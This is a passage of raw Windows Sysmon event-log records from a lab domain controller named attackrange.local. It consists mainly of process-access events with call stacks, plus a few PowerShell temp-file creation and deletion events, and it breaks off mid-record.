16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a3000|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a686b|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000002244287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a2ae1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018B4AF7)|UNKNOWN(FFFF9F0F018AF181)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a686b|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002244286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.623{05ADC7E1-7946-6039-1610-00000000AD01}3144ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF14af672b.TMPMD5=447276F599C30177A0EA9A030C30E4DB,SHA256=DE114614183613CEDB27E92C354B8C848839AA92A117B7A9EF86F646C68FF426,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.608{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=793C38A85EC73CD72ED484944B0E5E1B,SHA256=1ABFB42506A01CC60C99954D03634BFBE1A147E918ED068DB19AEEA3DFCFFFFA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002244284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.561{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.561{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.514{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.514{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.514{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+16679|C:\Windows\System32\SHELL32.dll+af480|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.514{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.514{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0420|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.514{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+95ad0|C:\Windows\System32\SHELL32.dll+b03dc|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.514{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.514{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014764C:\Windows\explorer.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002244274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:56:29.498{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280\PSHost.132591777894043153.8280.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002244273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.467{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_qhdkgskw.rrf.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.467{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_tfkxqlop.xwb.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002244271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.445{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_tfkxqlop.xwb.ps12021-03-02 16:56:29.445 10341000x80000000000000002244270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.445{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.405{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.405{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.405{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.405{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.405{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\